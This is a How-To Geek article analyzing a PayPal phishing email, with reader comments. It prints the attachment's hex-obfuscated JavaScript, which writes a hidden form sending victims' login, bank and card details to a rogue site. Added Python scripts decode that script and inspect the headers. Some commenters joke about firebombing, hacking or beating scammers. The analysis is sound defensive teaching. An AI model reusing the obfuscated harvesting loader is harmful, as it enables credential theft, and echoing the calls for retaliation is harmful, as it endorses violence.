How-To Geek

Online Security: Breaking Down the Anatomy of a Phishing Email


In today’s world where everyone’s information is online, phishing is one of the most popular and devastating online attacks, because you can always clean a virus, but if your banking details are stolen, you’re in trouble. Here’s a breakdown of one such attack we received.

Don’t think that it’s just your banking details that are important: after all, if someone gains control over your account login they not only know the information contained in that account, but the odds are that same login information may be used on various other accounts. And if they compromise your email account, they can reset all your other passwords.

So in addition to keeping strong and varied passwords, you have to always be on the lookout for bogus emails masquerading as the real thing. While most phishing attempts are amateurish, some are quite convincing, so it is important to understand how to recognize them at surface level as well as how they work under the hood.

Image by asirap

Examining What is in Plain Sight

Our example email, like most phishing attempts, “notifies” you of activity on your PayPal account which would, under normal circumstances, be alarming. So the call to action is to verify/restore your account by submitting just about every piece of personal information you can think of. Again, this is pretty formulaic.

While there certainly are exceptions, pretty much every phishing and scam email is loaded with red flags directly in the message itself. Even if the text is convincing, you can usually find many mistakes littered throughout the message body which indicate the message is not legit.

The Message Body


At first glance, this is one of the better phishing emails I have seen. There are no spelling or grammatical mistakes and the verbiage reads according to what you might expect. However, there are a few red flags you can see when you examine the content a bit more closely.

  • “Paypal” – The correct case is “PayPal” (capital P). You can see both variations are used in the message. Companies are very deliberate with their branding, so it is doubtful something like this would pass the proofing process.
  • “allow ActiveX” – How many times have you seen a legit web based business the size of Paypal use a proprietary component which only works on a single browser, especially when they support multiple browsers? Sure, somewhere out there some company does it, but this is a red flag.
  • “securely.” – Notice how this word does not line up in the margin with the rest of the paragraph text. Even if I stretch the window a bit more, it doesn’t wrap or space correctly.
  • “Paypal !” – The space before the exclamation mark looks awkward. Just another quirk which I am sure would not be in a legit email.
  • “PayPal- Account Update Form.pdf.htm” – Why would Paypal attach a “PDF” especially when they could just link to a page on their site? Additionally, why would they try to disguise an HTML file as a PDF? This is the biggest red flag of them all.

The Message Header


When you take a look at the message header, a couple more red flags appear:

  • The from address is test@test.com.
  • The to address is missing. I did not blank this out, it simply isn’t part of the standard message header. Typically a company which has your name will personalize the email to you.

The Attachment

When you open the attachment, you can immediately see the layout is not correct as it is missing style information. Again, why would PayPal email an HTML form when they could simply give you a link on their site?

Note: we used Gmail’s built-in HTML attachment viewer for this, but we’d recommend that you DO NOT OPEN attachments from scammers. Never. Ever. They very often contain exploits that will install trojans on your PC to steal your account info.


Scrolling down a bit more you can see that this form asks not only for our PayPal login information, but for banking and credit card information as well. Some of the images are broken.


It is obvious this phishing attempt is going after everything with one swoop.

The Technical Breakdown

While it should be pretty clear based on what is in plain sight that this is a phishing attempt, we are now going to break down the technical makeup of the email and see what we can find.

Information from the Attachment

The first thing to take a look at is the HTML source of the attachment form which is what submits the data to the bogus site.

When quickly viewing the source, all the links appear valid as they point to either “paypal.com” or “paypalobjects.com” which are both legit.


Now we are going to take a look at some basic page information Firefox gathers on the page.


As you can see, some of the graphics are pulled from the domains “blessedtobe.com”, “goodhealthpharmacy.com” and “pic-upload.de” instead of the legit PayPal domains.


Information from the Email Headers

Next we will take a look at the raw email message headers. Gmail makes this available via the Show Original menu option on the message.


Looking at the header information for the original message, you can see this message was composed using Outlook Express 6. I doubt PayPal has someone on staff who sends each of these messages manually via an outdated email client.


Now looking at the routing information, we can see the IP address of both the sender and the relaying mail server.


The “User” IP address is the original sender. Doing a quick lookup on the IP information, we can see the sending IP is in Germany.


And when we look at the relaying mail server’s (mail.itak.at) IP address, we can see this is an ISP based in Austria. I doubt PayPal routes their emails directly through an Austria-based ISP when they have a massive server farm which could easily handle this task.
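The header reading done in this section (walking the Received chain back to the originating machine, noting the relay, the From address and the mail client, and the missing To) can be automated. The script below is an added example written for this article, not code from the article or from Gmail; the raw message it analyses is constructed to resemble what Show Original displayed here, using the hostname the article names (mail.itak.at) but RFC 5737 documentation IP addresses in place of the real ones.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Domain the message claims to come from (the From display name says "PayPal").
CLAIMED_DOMAINS = {"paypal.com"}

# Constructed raw message standing in for what Gmail's "Show Original" displayed
# for the article's sample. Hostnames are the ones the article names; the IP
# addresses are RFC 5737 documentation addresses, not the real ones.
RAW_MESSAGE = """Received: from mail.itak.at (mail.itak.at [198.51.100.5])
    by mx.example.net with ESMTP id 0123abc
    for <victim@example.net>; Wed, 13 Apr 2011 09:15:02 -0700 (PDT)
Received: from User ([192.0.2.10]) by mail.itak.at with Microsoft SMTPSVC;
    Wed, 13 Apr 2011 18:14:50 +0200
From: "PayPal" <test@test.com>
Subject: Your account has been limited
X-Mailer: Microsoft Outlook Express 6 (constructed sample value)
Content-Type: text/html; charset="iso-8859-1"

<html>(body omitted)</html>
"""

IPV4 = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b")


def received_chain(msg):
    """Return one (from_host, ip) pair per hop, oldest hop first.

    Each relay prepends its own Received header, so the header nearest the
    body is the first hop: the machine the message actually came from.
    """
    hops = []
    for value in reversed(msg.get_all("Received", [])):
        value = " ".join(value.split())          # unfold continuation lines
        host = re.match(r"from (\S+)", value)
        ip = IPV4.search(value)
        hops.append((host.group(1) if host else None, ip.group(1) if ip else None))
    return hops


def analyze_headers(raw):
    """Pull out the facts the article reads off the raw headers and flag the oddities."""
    msg = message_from_string(raw)
    hops = received_chain(msg)
    display, addr = parseaddr(msg.get("From", ""))
    sender_domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    findings = {
        "origin": hops[0] if hops else None,        # e.g. ("User", "192.0.2.10")
        "relays": [host for host, _ in hops[1:]],   # e.g. ["mail.itak.at"]
        "mailer": msg.get("X-Mailer"),
        "flags": [],
    }
    if msg.get("To") is None:
        findings["flags"].append("no To header: the message is not addressed to anyone in particular")
    if sender_domain and sender_domain not in CLAIMED_DOMAINS:
        findings["flags"].append(f"From address {addr} is not under a {display or 'claimed'} domain")
    if findings["mailer"] and "outlook express" in findings["mailer"].lower():
        findings["flags"].append("composed in a desktop mail client rather than a bulk-mail system")
    return findings


if __name__ == "__main__":
    for key, value in analyze_headers(RAW_MESSAGE).items():
        print(f"{key}: {value}")
```

The origin host and IP come from the bottom-most Received header because every relay adds its own line on top; a forged Received line can only be inserted below the ones your own mail servers added, so the hops nearest the top are the ones you can trust. A geolocation or whois lookup on the origin IP, as the article does, is the natural next step once the chain has been extracted.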


Where Does the Data Go?

So we have clearly determined this is a phishing email and gathered some information about where the message originated from, but what about where your data is sent?

To see this, we first have to save the HTM attachment to our desktop and open it in a text editor. Scrolling through it, everything appears to be in order until we get to a suspicious looking JavaScript block.


Breaking out the full source of the last block of JavaScript, we see:

<script language="JavaScript" type="text/javascript">
// Copyright © 2005 Voormedia – WWW.VOORMEDIA.COM
// x holds the hidden markup as a hex string; the loop turns each pair of hex digits back into one character and writes the result into the page.
var i,y,x="3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e";y="";for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);
</script>

Any time you see a large jumbled string of seemingly random letters and numbers embedded in a JavaScript block, it is usually something suspicious. Looking at the code, the variable “x” is set to this large string and then decoded into the variable “y”. The final result of variable “y” is then written to the document as HTML.

Since the large string is made of numbers 0-9 and the letters a-f, it is most likely encoded via a simple ASCII to Hex conversion:

3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e

Translates to:

<form name="main" id="main" method="post" action="http://www.dexposure.net/bbs/data/verify.php">

It is not a coincidence that this decodes into a valid HTML form tag which sends the results not to PayPal, but to a rogue site.

Additionally, when you view the HTML source of the form, you will see that this form tag is not visible because it is generated dynamically via the JavaScript. This is a clever way to hide what the HTML is actually doing if someone were to simply view the generated source of the attachment (as we did earlier) as opposed to opening the attachment directly in a text editor.
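The two checks this article performs on the attachment, listing where the visible markup really points (the “Information from the Attachment” section) and decoding the hex string inside the script block to expose the real form action, can be done together by a short static analysis. The following is an added example written for this article, not the article’s own code: it parses a constructed attachment that reuses the hex string shown above and one of the off-brand image hosts the article names, collects every domain referenced by href/src/action attributes, and decodes any long hex literal found inside a script block the same way the unescape loop does, so the form action that only exists at load time becomes visible without executing anything.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains the article identifies as legitimate for PayPal content.
LEGIT_DOMAINS = {"paypal.com", "paypalobjects.com"}

# Constructed sample attachment: the visible markup points at legitimate PayPal
# hosts plus one off-brand image host (as in the article), while the real form
# tag exists only as a hex string the script decodes at load time.
SAMPLE_ATTACHMENT = """<html><body>
<a href="https://www.paypal.com/">PayPal</a>
<img src="https://www.paypalobjects.com/logo.gif">
<img src="http://pic-upload.de/x.gif">
<script language="JavaScript" type="text/javascript">
var i,y,x="3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e";y="";for(i=0;i<x.length;i+=2){y+=unescape('%'+x.substr(i,2));}document.write(y);
</script>
<input name="password"></form>
</body></html>"""

HEX_LITERAL = re.compile(r'"([0-9a-fA-F]{16,})"')   # long quoted hex strings
URL_ATTRS = {"href", "src", "action"}


def hex_to_text(hexstr):
    """Same transform as the script's loop: every two hex digits become one character."""
    return bytes.fromhex(hexstr).decode("latin-1")


class LinkCollector(HTMLParser):
    """Collects every host referenced by href/src/action, plus raw script bodies."""

    def __init__(self):
        super().__init__()
        self.hosts = set()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        for name, value in attrs:
            if name in URL_ATTRS and value:
                host = urlparse(value).hostname
                if host:
                    self.hosts.add(host)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:          # script content arrives as one data chunk
            self.scripts.append(data)


def registrable(host):
    """Crude last-two-labels reduction: www.paypal.com -> paypal.com."""
    return ".".join(host.lower().split(".")[-2:])


def analyze(html):
    """Report off-brand hosts in the visible markup and form actions hidden in hex."""
    collector = LinkCollector()
    collector.feed(html)
    report = {"visible_offbrand": set(), "hidden_actions": []}
    for host in collector.hosts:
        if registrable(host) not in LEGIT_DOMAINS:
            report["visible_offbrand"].add(host)
    for body in collector.scripts:
        for blob in HEX_LITERAL.findall(body):
            if len(blob) % 2:        # odd length cannot be byte-wise hex
                continue
            decoded = hex_to_text(blob)
            # A form action that only appears after decoding is the hidden one.
            report["hidden_actions"].extend(re.findall(r'action=["\']([^"\']+)', decoded))
    return report


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_ATTACHMENT).items():
        print(f"{key}: {value}")
```

Because the parser never runs the script, the decoded form tag is not added to the visible link list; it is reported separately, which is exactly the distinction the article draws between the generated source and the raw file. The same hex-literal scan generalises to other attachments: any long even-length run of 0-9/a-f inside a script is worth decoding before deciding a page is harmless.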


Running a quick whois on the offending site, we can see this is a domain hosted at a popular web host, 1and1.


What stands out is the domain uses a readable name (as opposed to something like “dfh3sjhskjhw.net”) and the domain has been registered for 4 years. Because of this, I believe this domain was hijacked and used as a pawn in this phishing attempt.

Cynicism is a Good Defense

When it comes to staying safe online, it never hurts to have a good bit of cynicism.

While I am sure there are more red flags in the example email, what we have pointed out above are indicators we saw after just a few minutes of examination. Hypothetically, if the surface level of the email mimicked its legitimate counterpart 100%, the technical analysis would still reveal its true nature. This is why it is important to be able to examine both what you can and cannot see.

Jason Faulkner is a developer and IT professional who never has a hot cup of coffee far away. Interact with him on Google+

  • Published 04/13/11

Comments (45)

  1. Alex

    Great article! I particularly enjoyed the part where you uncovered the “rouge” site. (Hint: I think you meant “rogue”).

    But, seriously, excellent article; I learned a few interesting techniques from it.

  2. Scott

    This was a very interesting article with an excellent breakdown. I am curious about the ASCII to HEX conversion of the Javascript. Would it be possible for you to explain how the script does this conversion in a future article?

  3. Richard

    @Scott: It’s quite easy to decode the string yourself. What the code does is take the string and break it down into two character chunks. So 3c666f72 is broken down into 3c 66 6f and 72. These are hexadecimal (base 16) values.

    Now visit http://www.asciitable.com/ and you can see the ASCII character set which lists all the possible characters and then their decimal and hex values. For each two characters, look up the hex value in the table and see what character it returns:

    3c is 60 in decimal and is character <
    66 is 102 in decimal and is character f
    6f is 111 in decimal and is character o
    72 is 114 in decimal and is character r

    You can see the start of the string being created.

    Hope that helps.

  4. zs474

    Thanks sooooo much!!!!
    Very gooooood!!!!!!
    Please keep it up….
    We want more good articles!!!!

  5. Mike

    I’m sure you did it under strict and protected conditions… but dear lord, you downloaded the attachment from a phishing e-mail. At least you threw in the warning to NEVER DO THIS, but I physically cringed in my seat when I got to that part.

  6. Marco Hernandez

    great article and very well explained I had many clients affected by this but always had a hard time explaining how phishing works…

  7. Alphie

    Although a lot of its contents I could not follow, I still found it fascinating. Usually I send the phishing email, along with its headers, to my server which is Suddenlink. However, since I changed from XP to W7, I cannot figure out how to pull up the headers. Hope you can instruct me how to do so.

    I thoroughly enjoy your newsletter, especially the simpler tips. I’m 72 years old and a little late for me to learn all that complicated stuff even though I enjoy reading it. Regards.

    John

  8. D. Frank Robinson

    Anyone know of a site that will accept forwarded suspicious emails for an analysis like this? Or even better an app.

  9. Greg

    Excellent article. This should be sent around to everyone that is non-technical so as to help educate people with the obvious and not so obvious tips.

  10. Elliot

    Great article!
    I think you should mention rule #1.
    NEVER respond to emails asking for personal information.
    No legitimate website will send you an email asking for your passwords.

  11. Dee

    Good article but who has time to decipher all these insipid emails, prolly why they created the DELETE button…

  12. ZenRuth

    If I receive a suspicious email from a company with which I do online business (PayPal, eBay, etc), I go to my browser and log into my account directly. If there is no “hold” on my account, I check my account status. I then email the business from their “contact us” and ask–did you send this email? Once in a while, they confirm that, yes, they sent it. But most times, the answer is no.

    Ruth

  13. dave

    From a technical stand point, interesting and informative. However, I’d much rather read an article on how I can Firebomb these MOFO’s to HELL!! Oh sorry my mask of icy calm slipped there for a second.

  14. Mathew

    Great article thanks for sharing!

    Although i am a web developer something i do as a hobby and have used the internet long enough to know immediately when something is not legitimate, it was a great read and hopefully many people will read this and learn how they can spot a phishing email.

    In reply to Scott and the Richard -
    I won’t post any links but there are many online tools that will encode/decode to save you looking up a list and obviously much quicker.

  15. grillermo

    Very interesting read, but something caught my attention even more, i realized that i only entered the article(from my rss reader) because of the pretty image, it gave the article a very professional look and i realized it was because i thought: they spend so much time writing the article that they felt it the effort justified using a custom made illustration.
    I never saw how powerful this can be until i read this article, that i felt its aimed at spam filters developers.
    P.S. i love this site your content’s quality rocks

  16. grayhoose

    i got this from yahoo: http://www.haltabuse.org/help/headers/index.shtml

    and i send spam to: spam@uce.gov

  17. Steven Torrey

    Many thanks. Just yesterday I received an email about a long lost relative who had $1.6 million in the bank for me to claim. Needless to say, immediate delete. Not so long previous, emails claiming to be from the bank… As always, immediate delete…

    I also noticed the ‘rouge’ when ‘rogue’ was intended.

  18. Burton

    Excellent expository writing and very much appreciated!

  19. John C

    Another thing to point out is that phishing emails may have a link which displays something like http://www.paypal.com. However, when you hover your mouse over the link and look at the actual target address on the status bar, it often shows domains in china or russia.

    As ZenRuth says, I also never log onto any financial sites via a link. I always go directly to the site. I also use trusteer Rapport which was recommended by my bank. It verifies that you are talking to the real site and blocks keyloggers and any screen captures while you are working on a protected site. If you attempt to type a password on a non-legit site it warns you before you send the page.

  20. Mathew

    I agree Steven,

    Sadly i get such emails everyday. But what i do is this:

    I have an aol email account for sites that i don’t want to give my main email address out to and that is always full of spam and phishing emails. In fact i can guarantee that i get about 100 emails per day some with attachments that i just delete on AOL mail server, others claiming to be from several banks and poverty scams and the scam you mention.

    I never really get spam in my main email address as i only give it out to people and websites that i know i can trust.

    Also another good little tip if you want to call it that is to add a number or year for example in a new email address, this makes it harder for script buddies and script generators to come up with an email address that not only contains a common word and/or name but also has to have random numbers appended to it.

    It’s a bit like a dictionary attack, that is when a script for example uses a list of common words, usually words in a dictionary hence the name “dictionary attack” and other lists that are shared online like a persons username, names list and they develop such scripts to use these words, names etc append them, add numbers etc to them and have the script to come up with millions of different combinations.

    They then end up with millions of randomly generated emails, usernames, passwords and so on and can use them as they wish for sending out bulk spam, to try and hack peoples accounts online by getting these scripts to submit all these generated details to another sites login form for example and cause a DOS attack.

    All these sort of things usually have something in common on how they work and what they do.

    But thankfully over the past few years it is becoming more known now and more people are learning about such things; although i still personally think that we are still way off in educating users who use computers and the internet. Sadly people still fall for these scams and like the old wives’ tale says “If it sounds too good to be true.” A true valid tale that i say to myself often.

    Some scams are harder to notice than others and obviously not everyone will know what they are, what they mean, how one can prevent themselves from such things, like an XSS (Cross Site Scripting). I could be here all day going on about this matter and many others developers face everyday when building web applications and so on.

  21. Pete Frosio

    Great article!!! Hmmmmm, ……. does anyone have a way to “….. Firebomb these MOFO’s to HELL!!” (Dave above) ? It just might be FUN to take ‘em out, eh?

  22. zs474

    @Pete Frosio
    (Reporting will be a waste of time!!)

    Does anyone have a way to “….. Firebomb these *…*’s??

  23. Paolo

    May be your snapshot of geek art means analytical physiology knowledge of issue but I cannot read this article because I think that e-mail reading and selecting can be a risk that people can avoid just using a good anti-spam, because we usually arrive later than authors of this frauds. We cannot patrol this without falling paranoid and it is easier for a damned hacker to treat newbies trying to be expert!

  24. Eric

    @dave
    Yes please, an article of “Firebombing” would be awesome… or just an article where you do some more research =)

  25. Daryl

    Very nice article, I’m sending this on to everyone I know.
    Thanks

  26. Louis Payton

    Great article. The most obvious thing I noticed to be a red flag was the email was addressed to “Paypal Member”. When I get a valid message from Paypal it is always addressed to me by name. I do have to agree with those wishing for a method of sending a firebomb back to the source.

  27. Hamish51

    Very interesting article. However it would be useful to those creating such ROGUE emails, in order to refine their technique.

  28. astralcyborg

    Great information and very understandable. Thank you.
    It’s scary the thought of someone falling into such a trap, though…

  29. eduboris

    Don’t forget to click the SPAM button in your gmail, they will make sure other people don’t get this email to their inbox but instead to the spam folder!

    you can also report it as phishing by clicking the down arrow near ‘Reply’ and “Report Phishing”

    as far as making sure they get stopped you will have to dig into the details as shown and actually email the hosts abuse portals to report them and they often will disable the accounts associated with the phishing….good article

  30. Santo

    @Jason

    Is there any thing else that needs to be written about phishing? I am sure there is nothing left. You had explained every thing about phishing in a detailed way. If someone wants to do a thesis about phishing they should refer to this article first.

  31. Rick S

    Great stuff, A lot of people don’t even think about that stuff and they get snagged.
    If I knew computers better I would send them a nasty virus. It may be easier than a firebomb. lol.

    A great retirement hobby would be tracking them down and ramming their heads into the keyboard and using a hammer on their typing fingers. Posting it on youtube would make others think twice.

  32. Ron D

    Another easy way to figure out if something is fishy, is to hover your cursor over the sending address. many times, it will be from paypall.com or something similarly misspelled. Spelling is important, and that is something that many people don’t look for. Of course, this only works in certain email programs, so it might not work in all of them. I forward all suspect emails to the REAL paypal company, or whoever the phisher is trying to imitate. They appreciate the help at catching these dipwads.

  33. Arun G Nair

    The article was excellent.
    U were discussing every single detail and showing us how easy it is to find out such phishing attacks

  34. Adrian

    One of the best articles I’ve seen on the subject and some quality responses too with other things to look out for. Excellent stuff. I do believe though that many regular PC users out there would get bored at the in-depth detail and switch off. However this type of thing should be in the tech curriculum at schools – it’s one thing teaching maths in school but there’s nothing in how to manage your finances in the big wide world, another minefield which is not totally unrelated to this article. Just my four penn’orth (used to be 2d but inflation struck).

  35. Terry46

    Great article. I use Windows Mail and have it set not to automatically open email (Layout/Preview Pane is unchecked). If I get a suspicious one, I right click the email, click Properties and then the tab Details and the button Message Source. If nothing looks familiar or there is no message, I close back to the email and delete it with Shift+Delete. It’s gone without ever having been opened.

  36. BM

    Very meticulously written article on phishing, especially the Javascript decoding part. Excellent piece of work. The easiest way to identify phishing is usually by the grammatical and formatting inconsistencies in the email. Let’s hope those guys never improve on that part because decoding Javascript is not everybody’s cup of tea.

  37. Chris

    Amazing article! ASCII to HEX conversion… that’s brilliant.

  38. Keybored

    still, the best way to defend yourselves from these pesky phishers is to use your common sense.
    just plain common sense and you will be safe.

  39. Chris Yost

    I can’t tell you how long I’ve been waiting for an informative article on how to break down an email like this.
    Thanks!!

    Oh, it’s not “import” to be able to examine both what you can and cannot see, but it *is* “importANT” ;)

  40. remoran

    It’s a 10!!! :)

  41. Daniel D'Laine

    Yep, great article. The only trouble is – finding the time to go through all the checks to find the senders. Sometimes I just can’t help myself though if it’s a really good fake and I use an old address to send varying replies, but these do no good. You don’t even upset these types of trashy scamsters. They do what you should be doing… deleting the email before it does any damage! ‘Spamitback’ is an interesting app, you should check it out Dave!

  42. Jon

    Excellent article, I especially liked the breakdown of the mail and how you were able to show the various components. Which will come into great use in the future.

  43. wschloss

    Most legitimate sites have a “security page” or at least email to which such can be forwarded so they can take action to protect both themselves and their clients/customers. Here is PayPal’s: https://www.paypal-search.com/socialsearch/query

    When something like this is received users should spend 10 minutes to follow-up for their own sake and that of the community. The internet comes with both rights AND responsibilities. Not taking that extra step is the equivalent of witnessing an attempted purse snatching, and doing absolutely nothing!

  44. belle lomita

    Is there a way to rid a Phishing address in the tool bar? The bar at the top of the browser?

  45. belle lomita

    Is there a way to permanently remove a Phishing site from a tool bar at the top of the browser? Thank you.
